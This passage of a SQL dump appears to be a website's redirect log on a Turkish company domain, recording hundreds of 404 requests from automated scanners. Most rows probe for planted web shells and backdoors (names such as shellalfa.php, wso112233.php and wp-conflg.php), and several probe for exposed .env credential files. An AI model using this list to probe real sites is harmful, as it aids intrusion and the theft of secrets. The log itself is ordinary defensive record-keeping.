00:00:00',301),(50101,'http://www.3s-technologies.com.tr/tr/efile.php',NULL,'','',2,0,'2025-11-30 01:36:36','0000-00-00 00:00:00',301),(50102,'http://www.3s-technologies.com.tr/tr/file32.php',NULL,'','',4,0,'2025-11-30 01:36:53','0000-00-00 00:00:00',301),(50103,'http://www.3s-technologies.com.tr/tr/admir.php',NULL,'','',3,0,'2025-11-30 01:37:03','0000-00-00 00:00:00',301),(50104,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/wp-is.php',NULL,'','',3,0,'2025-11-30 01:37:04','0000-00-00 00:00:00',301),(50105,'http://www.3s-technologies.com.tr/tr/wp-admin/admin-post.php',NULL,'','',3,0,'2025-11-30 01:37:05','0000-00-00 00:00:00',301),(50106,'http://www.3s-technologies.com.tr/tr/wp-content/themes/admin.php',NULL,'','',6,0,'2025-11-30 01:37:06','0000-00-00 00:00:00',301),(50107,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/xmrlpc.php',NULL,'','',3,0,'2025-11-30 01:37:07','0000-00-00 00:00:00',301),(50108,'http://www.3s-technologies.com.tr/tr/wp-admin/css/colour.php',NULL,'','',3,0,'2025-11-30 01:37:10','0000-00-00 00:00:00',301),(50109,'http://www.3s-technologies.com.tr/tr/wp-includes/sodium_compat/index.php',NULL,'','',3,0,'2025-11-30 01:37:13','0000-00-00 00:00:00',301),(50110,'http://www.3s-technologies.com.tr/tr/menu.phphttps:/robertatimothy.com/wp-content/packed.php',NULL,'','',1,0,'2025-11-30 01:37:14','0000-00-00 00:00:00',301),(50111,'http://www.3s-technologies.com.tr/tr/wp-content/themes/sketch/404.php',NULL,'','',2,0,'2025-11-30 01:37:16','0000-00-00 00:00:00',301),(50112,'http://www.3s-technologies.com.tr/tr/file4.php',NULL,'','',3,0,'2025-11-30 01:37:20','0000-00-00 00:00:00',301),(50113,'http://www.3s-technologies.com.tr/tr/666.php',NULL,'','',18,0,'2025-11-30 01:37:22','0000-00-00 00:00:00',301),(50114,'http://www.3s-technologies.com.tr/tr/fs.php',NULL,'','',15,0,'2025-11-30 01:37:24','0000-00-00 00:00:00',301),(50115,'http://www.3s-technologies.com.tr/tr/bless11.php',NULL,'','',8,0,'2025-11-30 01:37:25','0000-00-00 00:00:00',301),(50116,'http://www.3s-technologies.com.tr/tr/file3.php',NULL,'','',4,0,'2025-11-30 01:37:29','0000-00-00 00:00:00',301),(50117,'http://www.3s-technologies.com.tr/tr/dlu.php',NULL,'','',4,0,'2025-11-30 01:37:31','0000-00-00 00:00:00',301),(50118,'http://www.3s-technologies.com.tr/tr/lala.php',NULL,'','',7,0,'2025-11-30 01:37:34','0000-00-00 00:00:00',301),(50119,'http://www.3s-technologies.com.tr/tr/owl.php',NULL,'','',4,0,'2025-11-30 01:37:39','0000-00-00 00:00:00',301),(50120,'http://www.3s-technologies.com.tr/tr/wp-admin/js/wp-conflg.php',NULL,'','',8,0,'2025-11-30 01:37:46','0000-00-00 00:00:00',301),(50121,'http://www.3s-technologies.com.tr/tr/tox.php',NULL,'','',4,0,'2025-11-30 01:37:46','0000-00-00 00:00:00',301),(50122,'http://www.3s-technologies.com.tr/tr/noe.php',NULL,'','',2,0,'2025-11-30 01:37:53','0000-00-00 00:00:00',301),(50123,'http://www.3s-technologies.com.tr/tr/shellalfa.php',NULL,'','',2,0,'2025-11-30 01:37:55','0000-00-00 00:00:00',301),(50124,'http://www.3s-technologies.com.tr/tr/cccc.php',NULL,'','',3,0,'2025-11-30 01:37:58','0000-00-00 00:00:00',301),(50125,'http://www.3s-technologies.com.tr/tr/wp-update.php',NULL,'','',6,0,'2025-11-30 01:38:02','0000-00-00 00:00:00',301),(50126,'http://www.3s-technologies.com.tr/tr/file18.php',NULL,'','',6,0,'2025-11-30 01:38:05','0000-00-00 00:00:00',301),(50127,'http://www.3s-technologies.com.tr/tr/static/sallu.php',NULL,'','',1,0,'2025-11-30 01:38:08','0000-00-00 00:00:00',301),(50128,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/wp.php',NULL,'','',3,0,'2025-11-30 01:38:13','0000-00-00 00:00:00',301),(50129,'http://www.3s-technologies.com.tr/tr/layout.php',NULL,'','',4,0,'2025-11-30 01:38:28','0000-00-00 00:00:00',301),(50130,'http://www.3s-technologies.com.tr/tr/wp-content/upgrade/index.php',NULL,'','',5,0,'2025-11-30 01:38:32','0000-00-00 00:00:00',301),(50131,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/wp-conflg.php',NULL,'','',3,0,'2025-11-30 01:38:34','0000-00-00 00:00:00',301),(50132,'http://www.3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/rnepv9.php',NULL,'','',2,0,'2025-11-30 01:38:38','0000-00-00 00:00:00',301),(50133,'http://www.3s-technologies.com.tr/tr/png.php',NULL,'','',4,0,'2025-11-30 01:38:38','0000-00-00 00:00:00',301),(50134,'http://www.3s-technologies.com.tr/tr/miansha.php',NULL,'','',3,0,'2025-11-30 01:38:46','0000-00-00 00:00:00',301),(50135,'http://www.3s-technologies.com.tr/tr/wp-links-opml.php',NULL,'','',8,0,'2025-11-30 01:38:48','0000-00-00 00:00:00',301),(50136,'http://www.3s-technologies.com.tr/tr/filemanager.php',NULL,'','',4,0,'2025-11-30 01:38:55','0000-00-00 00:00:00',301),(50137,'http://www.3s-technologies.com.tr/tr/ouh.php',NULL,'','',2,0,'2025-11-30 01:38:58','0000-00-00 00:00:00',301),(50138,'http://3s-technologies.com.tr/en/wp-admin/load-scripts.php',NULL,'','',3,0,'2025-11-30 04:26:40','0000-00-00 00:00:00',301),(50139,'http://3s-technologies.com.tr/en/wp-admin/load-styles.php',NULL,'','',3,0,'2025-11-30 04:26:41','0000-00-00 00:00:00',301),(50140,'http://3s-technologies.com.tr/en/wp-includes/css/dashicons.css',NULL,'','',3,0,'2025-11-30 04:26:43','0000-00-00 00:00:00',301),(50141,'http://3s-technologies.com.tr/en/wp-includes/version.php',NULL,'','',5,0,'2025-11-30 04:26:46','0000-00-00 00:00:00',301),(50142,'http://3s-technologies.com.tr/en/wp-includes/functions.php',NULL,'','',7,0,'2025-11-30 04:26:47','0000-00-00 00:00:00',301),(50143,'http://3s-technologies.com.tr/en/wp-includes/class-wp.php',NULL,'','',5,0,'2025-11-30 04:26:48','0000-00-00 00:00:00',301),(50144,'http://3s-technologies.com.tr/en/wp-includes/option.php',NULL,'','',5,0,'2025-11-30 04:26:49','0000-00-00 00:00:00',301),(50145,'http://3s-technologies.com.tr/en/wp-includes/post.php',NULL,'','',5,0,'2025-11-30 04:26:50','0000-00-00 00:00:00',301),(50146,'http://3s-technologies.com.tr/en/wp-includes/user.php',NULL,'','',5,0,'2025-11-30 04:26:51','0000-00-00 00:00:00',301),(50147,'http://3s-technologies.com.tr/en/wp-json/wp/v2',NULL,'','',3,0,'2025-11-30 04:26:53','0000-00-00 00:00:00',301),(50148,'http://3s-technologies.com.tr/en/wp-json/oembed/1.0/embed',NULL,'','',3,0,'2025-11-30 04:26:54','0000-00-00 00:00:00',301),(50149,'http://3s-technologies.com.tr/en/wp-json/wp/v2/posts',NULL,'','',3,0,'2025-11-30 04:26:57','0000-00-00 00:00:00',301),(50150,'http://3s-technologies.com.tr/en/wp-json/wp/v2/pages',NULL,'','',3,0,'2025-11-30 04:26:58','0000-00-00 00:00:00',301),(50151,'http://3s-technologies.com.tr/en/wp-json/wp/v2/media',NULL,'','',3,0,'2025-11-30 04:26:59','0000-00-00 00:00:00',301),(50152,'http://3s-technologies.com.tr/en/wp-json/wp/v2/categories',NULL,'','',3,0,'2025-11-30 04:27:00','0000-00-00 00:00:00',301),(50153,'http://3s-technologies.com.tr/en/wp-json/wp/v2/tags',NULL,'','',3,0,'2025-11-30 04:27:01','0000-00-00 00:00:00',301),(50154,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwenty',NULL,'','',3,0,'2025-11-30 04:27:03','0000-00-00 00:00:00',301),(50155,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwentyone',NULL,'','',3,0,'2025-11-30 04:27:04','0000-00-00 00:00:00',301),(50156,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwentytwo',NULL,'','',3,0,'2025-11-30 04:27:05','0000-00-00 00:00:00',301),(50157,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwentythree',NULL,'','',3,0,'2025-11-30 04:27:06','0000-00-00 00:00:00',301),(50158,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet',NULL,'','',25,0,'2025-11-30 04:27:08','0000-00-00 00:00:00',301),(50159,'http://3s-technologies.com.tr/en/wp-includes/images/w-logo-blue.png',NULL,'','',3,0,'2025-11-30 04:27:09','0000-00-00 00:00:00',301),(50160,'http://3s-technologies.com.tr/en/feed/rss',NULL,'','',3,0,'2025-11-30 04:27:13','0000-00-00 00:00:00',301),(50161,'http://3s-technologies.com.tr/en/feed/rss2',NULL,'','',3,0,'2025-11-30 04:27:14','0000-00-00 00:00:00',301),(50162,'http://3s-technologies.com.tr/en/feed/atom',NULL,'','',3,0,'2025-11-30 04:27:15','0000-00-00 00:00:00',301),(50163,'http://3s-technologies.com.tr/tr/file-manager/ckeditor',NULL,'','',3,0,'2025-11-30 06:10:36','0000-00-00 00:00:00',301),(50164,'http://3s-technologies.com.tr/tr/public_html/.env',NULL,'http://3s-technologies.com.tr/public_html/.env','',3,0,'2025-11-30 13:06:56','0000-00-00 00:00:00',301),(50165,'http://3s-technologies.com.tr/tr/api/v2/.env',NULL,'http://3s-technologies.com.tr/api/v2/.env','',2,0,'2025-11-30 13:06:56','0000-00-00 00:00:00',301),(50166,'http://3s-technologies.com.tr/tr/htdocs/.env',NULL,'http://3s-technologies.com.tr/htdocs/.env','',2,0,'2025-11-30 13:06:56','0000-00-00 00:00:00',301),(50167,'http://3s-technologies.com.tr/tr/server/.env',NULL,'http://3s-technologies.com.tr/server/.env','',2,0,'2025-11-30 13:06:58','0000-00-00 00:00:00',301),(50168,'http://3s-technologies.com.tr/tr/api/v1/.env',NULL,'http://3s-technologies.com.tr/api/v1/.env','',2,0,'2025-11-30 13:07:00','0000-00-00 00:00:00',301),(50169,'http://3s-technologies.com.tr/tr/system/.env',NULL,'http://3s-technologies.com.tr/system/.env','',1,0,'2025-11-30 13:07:01','0000-00-00 00:00:00',301),(50170,'http://3s-technologies.com.tr/en/tewfzpcz.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2025-12-02 01:33:01','0000-00-00 00:00:00',301),(50171,'https://3s-technologies.com.tr/en/aatroscf.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2025-12-02 01:33:02','0000-00-00 00:00:00',301),(50172,'http://3s-technologies.com.tr/tr/assets/include',NULL,'','',3,0,'2025-12-02 13:37:56','0000-00-00 00:00:00',301),(50173,'http://3s-technologies.com.tr/tr/wp-includes/requests/text',NULL,'','',3,0,'2025-12-02 13:38:57','0000-00-00 00:00:00',301),(50174,'http://3s-technologies.com.tr/en/wp-includes/rest-api/search/index.php',NULL,'https://www.google.co.uk/','',42,0,'2025-12-02 15:02:23','0000-00-00 00:00:00',301),(50175,'http://3s-technologies.com.tr/tr/z57.php?p=',NULL,'','',2,0,'2025-12-02 20:15:40','0000-00-00 00:00:00',301),(50176,'http://3s-technologies.com.tr/tr/kdrex.php',NULL,'','',2,0,'2025-12-02 20:15:55','0000-00-00 00:00:00',301),(50177,'https://www.3s-technologies.com.tr/tr/index.html',NULL,'','',2,0,'2025-12-03 14:37:31','0000-00-00 00:00:00',301),(50178,'http://3s-technologies.com.tr/tr/ctex1.php',NULL,'','',18,0,'2025-12-03 23:29:40','0000-00-00 00:00:00',301),(50179,'http://3s-technologies.com.tr/tr/t1.php',NULL,'','',8,0,'2025-12-03 23:29:41','0000-00-00 00:00:00',301),(50180,'http://3s-technologies.com.tr/tr/bless',NULL,'','',3,0,'2025-12-03 23:29:44','0000-00-00 00:00:00',301),(50181,'http://3s-technologies.com.tr/tr/ha.php',NULL,'','',47,0,'2025-12-03 23:29:45','0000-00-00 00:00:00',301),(50182,'http://3s-technologies.com.tr/tr/gtc.php',NULL,'','',48,0,'2025-12-03 23:29:59','0000-00-00 00:00:00',301),(50183,'http://3s-technologies.com.tr/tr/public/fm.php',NULL,'','',3,0,'2025-12-03 23:30:08','0000-00-00 00:00:00',301),(50184,'http://3s-technologies.com.tr/tr/lsd.php',NULL,'','',41,0,'2025-12-03 23:30:12','0000-00-00 00:00:00',301),(50185,'http://3s-technologies.com.tr/tr/file48.php',NULL,'','',74,0,'2025-12-03 23:30:23','0000-00-00 00:00:00',301),(50186,'http://3s-technologies.com.tr/tr/admin.php/upload/css.php',NULL,'','',3,0,'2025-12-03 23:30:25','0000-00-00 00:00:00',301),(50187,'http://3s-technologies.com.tr/tr/wp-content/wso112233.php',NULL,'http://3s-technologies.com.tr/wp-content/wso112233.php','',1,0,'2025-12-04 22:57:11','0000-00-00 00:00:00',301),(50188,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/file.php',NULL,'https://www.yahoo.com/','',34,0,'2025-12-04 23:28:51','0000-00-00 00:00:00',301),(50189,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/wp-login.php',NULL,'https://duckduckgo.com/','',30,0,'2025-12-04 23:28:54','0000-00-00 00:00:00',301),(50190,'http://3s-technologies.com.tr/en/sanskrit.php',NULL,'https://www.bing.com/','',15,0,'2025-12-04 23:28:56','0000-00-00 00:00:00',301),(50191,'http://3s-technologies.com.tr/en/ahax.php',NULL,'https://www.yahoo.com/','',133,0,'2025-12-04 23:29:00','0000-00-00 00:00:00',301),(50192,'http://3s-technologies.com.tr/en/assets/as.php',NULL,'https://www.google.de/','',14,0,'2025-12-04 23:29:01','0000-00-00 00:00:00',301),(50193,'http://3s-technologies.com.tr/en/av.php',NULL,'https://www.google.fr/','',63,0,'2025-12-04 23:29:02','0000-00-00 00:00:00',301),(50194,'http://3s-technologies.com.tr/en/bless.php',NULL,'https://www.google.fr/','',146,0,'2025-12-04 23:29:03','0000-00-00 00:00:00',301),(50195,'http://3s-technologies.com.tr/en/css/index.php',NULL,'https://www.google.fr/','',60,0,'2025-12-04 23:29:08','0000-00-00 00:00:00',301),(50196,'http://3s-technologies.com.tr/en/css/install.php',NULL,'https://www.bing.com/','',15,0,'2025-12-04 23:29:09','0000-00-00 00:00:00',301),(50197,'http://3s-technologies.com.tr/en/images/admin.php',NULL,'https://www.google.de/','',16,0,'2025-12-04 23:29:13','0000-00-00 00:00:00',301),(50198,'http://3s-technologies.com.tr/en/mah/function.php',NULL,'https://www.yahoo.com/','',96,0,'2025-12-04 23:29:18','0000-00-00 00:00:00',301),(50199,'http://3s-technologies.com.tr/en/network.php',NULL,'https://www.google.fr/','',17,0,'2025-12-04 23:29:22','0000-00-00 00:00:00',301),(50200,'http://3s-technologies.com.tr/en/vendor/phpunit/phpunit/src/util/php/as.php',NULL,'https://www.google.com/','',14,0,'2025-12-04 23:29:26','0000-00-00 00:00:00',301),(50201,'http://3s-technologies.com.tr/en/wp-admin/css/colors/ocean/about.php',NULL,'https://www.bing.com/','',17,0,'2025-12-04 23:29:26','0000-00-00 00:00:00',301),(50202,'http://3s-technologies.com.tr/en/wp-admin/network/admin.php',NULL,'https://www.bing.com/','',85,0,'2025-12-04 23:29:30','0000-00-00 00:00:00',301),(50203,'http://3s-technologies.com.tr/en/wp-content/edit.php',NULL,'https://www.yahoo.com/','',15,0,'2025-12-04 23:29:34','0000-00-00 00:00:00',301),(50204,'http://3s-technologies.com.tr/en/wp-content/languages/index.php',NULL,'https://www.bing.com/','',79,0,'2025-12-04 23:29:36','0000-00-00 00:00:00',301),(50205,'http://3s-technologies.com.tr/en/wp-content/themes/pridmag/install.php?u',NULL,'https://duckduckgo.com/','',14,0,'2025-12-04 23:29:39','0000-00-00 00:00:00',301),(50206,'http://3s-technologies.com.tr/en/wp-content/themes/tflow/as.php',NULL,'https://duckduckgo.com/','',15,0,'2025-12-04 23:29:40','0000-00-00 00:00:00',301),(50207,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwentyfour/system_cache.php',NULL,'https://www.yahoo.com/','',15,0,'2025-12-04 23:29:42','0000-00-00 00:00:00',301),(50208,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwentythree/patterns/index.php',NULL,'https://www.google.de/','',17,0,'2025-12-04 23:29:43','0000-00-00 00:00:00',301),(50209,'http://3s-technologies.com.tr/en/wp-editor.php',NULL,'https://www.google.de/','',57,0,'2025-12-04 23:29:44','0000-00-00 00:00:00',301),(50210,'http://3s-technologies.com.tr/en/wp-includes/id3/about.php',NULL,'https://www.google.de/','',20,0,'2025-12-04 23:29:47','0000-00-00 00:00:00',301),(50211,'http://3s-technologies.com.tr/en/wp-includes/id3/about.php/wp-content/x/index.php',NULL,'https://www.google.co.uk/','',14,0,'2025-12-04 23:29:47','0000-00-00 00:00:00',301),(50212,'http://3s-technologies.com.tr/en/wp-includes/id3/simi.php',NULL,'https://www.google.co.uk/','',55,0,'2025-12-04 23:29:48','0000-00-00 00:00:00',301),(50213,'http://3s-technologies.com.tr/en/wp-includes/phpmailer/index.php',NULL,'https://www.google.com/','',83,0,'2025-12-04 23:29:49','0000-00-00 00:00:00',301),(50214,'http://3s-technologies.com.tr/en/wp-includes/text/diff/renderer/index.php',NULL,'https://www.google.fr/','',60,0,'2025-12-04 23:29:54','0000-00-00 00:00:00',301),(50215,'http://3s-technologies.com.tr/en/wp-includes/text/index.php',NULL,'https://www.yahoo.com/','',50,0,'2025-12-04 23:29:57','0000-00-00 00:00:00',301),(50216,'http://3s-technologies.com.tr/en/wp-includes/text/xwx1.php',NULL,'https://www.google.de/','',42,0,'2025-12-04 23:29:58','0000-00-00 00:00:00',301),(50217,'http://3s-technologies.com.tr/en/wp-includes/assets/about.php',NULL,'https://www.google.de/','',48,0,'2025-12-04 23:29:59','0000-00-00 00:00:00',301),(50218,'http://3s-technologies.com.tr/en/wp-includes/block-bindings/radio.php',NULL,'https://www.google.com/','',13,0,'2025-12-04 23:30:02','0000-00-00 00:00:00',301),(50219,'http://3s-technologies.com.tr/en/wp-includes/class-wp-locale-switcher-less.php',NULL,'https://www.yahoo.com/','',13,0,'2025-12-04 23:30:04','0000-00-00 00:00:00',301),(50220,'http://3s-technologies.com.tr/en/wp-includes/css/index.php',NULL,'https://www.google.co.uk/','',35,0,'2025-12-04 23:30:05','0000-00-00 00:00:00',301),(50221,'http://3s-technologies.com.tr/en/wp-includes/customize/chosen.php',NULL,'https://www.google.co.uk/','',83,0,'2025-12-04 23:30:05','0000-00-00 00:00:00',301),(50222,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-media-icon-control.php',NULL,'https://www.yahoo.com/','',13,0,'2025-12-04 23:30:06','0000-00-00 00:00:00',301),(50223,'http://3s-technologies.com.tr/en/wp-includes/customize/sx.php',NULL,'https://www.google.fr/','',13,0,'2025-12-04 23:30:08','0000-00-00 00:00:00',301),(50224,'http://3s-technologies.com.tr/en/wp-includes/images/smilies/about.php',NULL,'https://duckduckgo.com/','',41,0,'2025-12-04 23:30:11','0000-00-00 00:00:00',301),(50225,'http://3s-technologies.com.tr/en/wp-includes/images/smilies/admin.php',NULL,'https://www.google.de/','',13,0,'2025-12-04 23:30:12','0000-00-00 00:00:00',301),(50226,'http://3s-technologies.com.tr/en/wp-includes/js/index.php',NULL,'https://www.yahoo.com/','',34,0,'2025-12-04 23:30:15','0000-00-00 00:00:00',301),(50227,'http://3s-technologies.com.tr/en/wp-includes/js/jquery/jquery.php',NULL,'https://www.google.de/','',70,0,'2025-12-04 23:30:16','0000-00-00 00:00:00',301),(50228,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/index.php',NULL,'https://www.google.de/','',12,0,'2025-12-04 23:30:17','0000-00-00 00:00:00',301),(50229,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/wp-conflg.php',NULL,'https://www.google.com/','',51,0,'2025-12-04 23:30:18','0000-00-00 00:00:00',301),(50230,'http://3s-technologies.com.tr/en/wp-includes/wp-db-array.php',NULL,'https://www.google.co.uk/','',12,0,'2025-12-04 23:30:19','0000-00-00 00:00:00',301),(50231,'http://3s-technologies.com.tr/en/wp-themes.php',NULL,'https://www.yahoo.com/','',40,0,'2025-12-04 23:30:20','0000-00-00 00:00:00',301),(50232,'http://3s-technologies.com.tr/en/wp-user.php',NULL,'https://www.google.co.uk/','',78,0,'2025-12-04 23:30:21','0000-00-00 00:00:00',301),(50233,'http://3s-technologies.com.tr/en/yas.php',NULL,'https://www.google.co.uk/','',44,0,'2025-12-04 23:30:24','0000-00-00 00:00:00',301),(50234,'http://3s-technologies.com.tr/en/wp-content/uploads/2025',NULL,'https://www.yahoo.com/','',86,0,'2025-12-04 23:31:00','0000-00-00 00:00:00',301),(50235,'http://3s-technologies.com.tr/en/wp-content/uploads/2024',NULL,'https://www.google.co.uk/','',32,0,'2025-12-04 23:31:01','0000-00-00 00:00:00',301),(50236,'http://3s-technologies.com.tr/en/wp-content/uploads/2023',NULL,'https://www.bing.com/','',31,0,'2025-12-04 23:31:02','0000-00-00 00:00:00',301),(50237,'https://3s-technologies.com.tr/tr?itemid=243',NULL,'','',3,0,'2025-12-05 08:23:58','0000-00-00 00:00:00',301),(50238,'http://mail.3s-technologies.com.tr/tr/oauth.php',NULL,'','',2,0,'2025-12-05 16:36:57','0000-00-00 00:00:00',301),(50239,'http://mail.3s-technologies.com.tr/tr/install.ph',NULL,'','',1,0,'2025-12-05 16:36:59','0000-00-00 00:00:00',301),(50240,'http://mail.3s-technologies.com.tr/tr/.well-known/options.php',NULL,'','',1,0,'2025-12-05 16:37:01','0000-00-00 00:00:00',301),(50241,'http://mail.3s-technologies.com.tr/tr/wp-content/sxx.php',NULL,'','',1,0,'2025-12-05 16:37:01','0000-00-00 00:00:00',301),(50242,'http://mail.3s-technologies.com.tr/tr/plugins/daozm.php',NULL,'','',10,0,'2025-12-05 16:37:02','0000-00-00 00:00:00',301),(50243,'http://mail.3s-technologies.com.tr/tr/xml.php',NULL,'','',7,0,'2025-12-05 16:37:07','0000-00-00 00:00:00',301),(50244,'http://mail.3s-technologies.com.tr/tr/images.php',NULL,'','',1,0,'2025-12-05 16:37:08','0000-00-00 00:00:00',301),(50245,'http://mail.3s-technologies.com.tr/tr/cgi-bin/wp-login.php',NULL,'','',2,0,'2025-12-05 16:37:28','0000-00-00 00:00:00',301),(50246,'http://mail.3s-technologies.com.tr/tr/berlin.php',NULL,'','',4,0,'2025-12-05 16:37:31','0000-00-00 00:00:00',301),(50247,'http://mail.3s-technologies.com.tr/tr/wp-includes/class-ftps.php',NULL,'','',1,0,'2025-12-05 16:37:32','0000-00-00 00:00:00',301),(50248,'http://mail.3s-technologies.com.tr/tr/permissions.php',NULL,'','',1,0,'2025-12-05 16:37:33','0000-00-00 00:00:00',301),(50249,'http://mail.3s-technologies.com.tr/tr/.tmb/la.php',NULL,'','',2,0,'2025-12-05 16:37:33','0000-00-00 00:00:00',301),(50250,'http://mail.3s-technologies.com.tr/tr/wp-admin/meta',NULL,'','',1,0,'2025-12-05 16:37:34','0000-00-00 00:00:00',301),(50251,'http://mail.3s-technologies.com.tr/tr/wp-includes/certificates/wp-login.php',NULL,'','',1,0,'2025-12-05 16:37:35','0000-00-00 00:00:00',301),(50252,'http://mail.3s-technologies.com.tr/tr/admin_logs.php',NULL,'','',1,0,'2025-12-05 16:37:36','0000-00-00 00:00:00',301),(50253,'http://mail.3s-technologies.com.tr/tr/s_ne.php',NULL,'','',1,0,'2025-12-05 16:37:37','0000-00-00 00:00:00',301),(50254,'http://mail.3s-technologies.com.tr/tr/wp-content/wp-login.php',NULL,'','',2,0,'2025-12-05 16:37:39','0000-00-00 00:00:00',301),(50255,'http://mail.3s-technologies.com.tr/tr/wp-includes/rx.php',NULL,'','',1,0,'2025-12-05 16:37:40','0000-00-00 00:00:00',301),(50256,'http://mail.3s-technologies.com.tr/tr/images/chosen.php',NULL,'','',13,0,'2025-12-05 16:38:36','0000-00-00 00:00:00',301),(50257,'http://mail.3s-technologies.com.tr/tr/wp-content/json.php',NULL,'','',7,0,'2025-12-05 16:38:38','0000-00-00 00:00:00',301),(50258,'http://mail.3s-technologies.com.tr/tr/wp-includes/fonts/index.php',NULL,'','',28,0,'2025-12-05 16:38:39','0000-00-00 00:00:00',301),(50259,'http://mail.3s-technologies.com.tr/tr/wp-includes/requests/file.php',NULL,'','',2,0,'2025-12-05 16:38:40','0000-00-00 00:00:00',301),(50260,'http://mail.3s-technologies.com.tr/tr/alfa.ph',NULL,'','',1,0,'2025-12-05 16:38:47','0000-00-00 00:00:00',301),(50261,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/buy.php',NULL,'','',1,0,'2025-12-05 16:38:48','0000-00-00 00:00:00',301),(50262,'http://mail.3s-technologies.com.tr/tr/.fk.php',NULL,'','',5,0,'2025-12-05 16:38:48','0000-00-00 00:00:00',301),(50263,'http://3s-technologies.com.tr/tr/components/com_youtubegallery/views/youtubegallery/tmpl/default.xml',NULL,'','',1,0,'2025-12-05 16:49:10','0000-00-00 00:00:00',301),(50264,'http://3s-technologies.com.tr/tr/wp-admin/maint/wp-is.php',NULL,'','',6,0,'2025-12-06 09:51:46','0000-00-00 00:00:00',301),(50265,'http://3s-technologies.com.tr/tr/wp-admin/css/colour.php',NULL,'','',10,0,'2025-12-06 09:51:52','0000-00-00 00:00:00',301),(50266,'http://3s-technologies.com.tr/tr/menu.phphttps:/robertatimothy.com/wp-content/packed.php',NULL,'','',1,0,'2025-12-06 09:51:56','0000-00-00 00:00:00',301),(50267,'http://3s-technologies.com.tr/tr/static/sallu.php',NULL,'','',1,0,'2025-12-06 09:52:48','0000-00-00 00:00:00',301),(50268,'http://3s-technologies.com.tr/tr/blurbs18.php',NULL,'','',17,0,'2025-12-06 20:41:48','0000-00-00 00:00:00',301),(50269,'http://3s-technologies.com.tr/tr/ghh.php',NULL,'','',1,0,'2025-12-06 20:41:49','0000-00-00 00:00:00',301),(50270,'http://3s-technologies.com.tr/tr/ce.php',NULL,'','',3,0,'2025-12-06 20:41:50','0000-00-00 00:00:00',301),(50271,'http://3s-technologies.com.tr/tr/sdm.php',NULL,'','',9,0,'2025-12-06 20:41:50','0000-00-00 00:00:00',301),(50272,'http://3s-technologies.com.tr/tr/por.php',NULL,'','',1,0,'2025-12-06 20:41:51','0000-00-00 00:00:00',301),(50273,'http://3s-technologies.com.tr/tr/nux.php',NULL,'','',2,0,'2025-12-06 20:41:52','0000-00-00 00:00:00',301),(50274,'http://3s-technologies.com.tr/tr/iri.php',NULL,'','',1,0,'2025-12-06 20:41:52','0000-00-00 00:00:00',301),(50275,'http://3s-technologies.com.tr/tr/85ohni.php',NULL,'','',1,0,'2025-12-06 20:41:53','0000-00-00 00:00:00',301),(50276,'http://3s-technologies.com.tr/tr/wp-set.php',NULL,'','',8,0,'2025-12-06 20:41:55','0000-00-00 00:00:00',301),(50277,'http://3s-technologies.com.tr/tr/amw.php',NULL,'','',1,0,'2025-12-06 20:41:56','0000-00-00 00:00:00',301),(50278,'http://3s-technologies.com.tr/tr/waba.php',NULL,'','',1,0,'2025-12-06 20:41:57','0000-00-00 00:00:00',301),(50279,'http://3s-technologies.com.tr/tr/styll.php',NULL,'','',26,0,'2025-12-06 20:41:57','0000-00-00 00:00:00',301),(50280,'http://3s-technologies.com.tr/tr/cheko.php',NULL,'','',1,0,'2025-12-06 20:41:58','0000-00-00 00:00:00',301),(50281,'http://3s-technologies.com.tr/tr/sfcl.php',NULL,'','',8,0,'2025-12-06 20:42:01','0000-00-00 00:00:00',301),(50282,'http://3s-technologies.com.tr/tr/oysdxc.php',NULL,'','',2,0,'2025-12-06 20:42:02','0000-00-00 00:00:00',301),(50283,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/sfcl.php',NULL,'','',1,0,'2025-12-06 20:42:02','0000-00-00 00:00:00',301),(50284,'http://3s-technologies.com.tr/tr/flap.php',NULL,'','',1,0,'2025-12-06 20:42:03','0000-00-00 00:00:00',301),(50285,'http://3s-technologies.com.tr/tr/ycc.php',NULL,'','',1,0,'2025-12-06 20:42:03','0000-00-00 00:00:00',301),(50286,'http://3s-technologies.com.tr/en/cgi-bin/index.php',NULL,'https://www.google.fr/','',15,0,'2025-12-06 21:35:12','0000-00-00 00:00:00',301),(50287,'http://3s-technologies.com.tr/en/mini',NULL,'https://www.google.com/','',47,0,'2025-12-06 21:35:19','0000-00-00 00:00:00',301),(50288,'http://3s-technologies.com.tr/en/modules/mod_simplefileuploadv1.3/elements/index.php',NULL,'https://www.bing.com/','',31,0,'2025-12-06 21:35:42','0000-00-00 00:00:00',301),(50289,'http://3s-technologies.com.tr/en/public/files/index.php',NULL,'https://www.google.fr/','',45,0,'2025-12-06 21:35:44','0000-00-00 00:00:00',301),(50290,'http://3s-technologies.com.tr/en/public/wp-content/index.php',NULL,'https://www.google.com/','',45,0,'2025-12-06 21:35:45','0000-00-00 00:00:00',301),(50291,'http://3s-technologies.com.tr/en/wp-admin/index.php',NULL,'https://www.google.de/','',76,0,'2025-12-06 21:35:49','0000-00-00 00:00:00',301),(50292,'http://3s-technologies.com.tr/en/wp-includes/js/codemirror/index.php',NULL,'https://duckduckgo.com/','',43,0,'2025-12-06 21:36:07','0000-00-00 00:00:00',301),(50293,'http://3s-technologies.com.tr/en/wp-includes/random_compat/index.php',NULL,'https://duckduckgo.com/','',40,0,'2025-12-06 21:36:09','0000-00-00 00:00:00',301),(50294,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/providers/index.php',NULL,'https://www.bing.com/','',42,0,'2025-12-06 21:36:11','0000-00-00 